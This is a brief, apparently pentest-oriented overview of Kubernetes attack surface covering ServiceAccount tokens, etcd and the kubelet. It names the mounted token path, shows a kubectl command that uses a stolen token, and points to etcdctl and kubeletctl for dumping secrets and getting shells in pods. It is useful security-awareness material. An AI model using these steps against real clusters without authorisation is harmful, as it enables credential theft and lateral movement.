Kubernetes Attack Surface
This is a short (and incomplete) overview of the attack surface for a Kubernetes cluster.
ServiceAccounts
A Kubernetes ServiceAccount
gives access to the K8s API.
By default this account is mounted in every pod and might give additional privileges in the cluster.
As an example, a ServiceAccount might be able to list all pods in a namespace or list and read secrets.
The default mount location is /var/run/secrets/kubernetes.io/serviceaccount
.
In this directory the token and CA cert are stored.
You can use those to talk to the K8s API:
kubectl --token=<token> --certificate-authority=<ca>
Etcd
Etcd is the ‘main database’ for Kubernetes.
If you gain access to etcd, you can list all secrets in the cluster.
Use etcdctl
.
Kubelet
Kubelet runs on every node in the cluster.
If there is unauthenticated access, it might be possible to interact with the pods that are running on that node.
You can use this to gain shell or execute commands inside a pod and pivot into or away from the cluster.
Use kubeletctl
.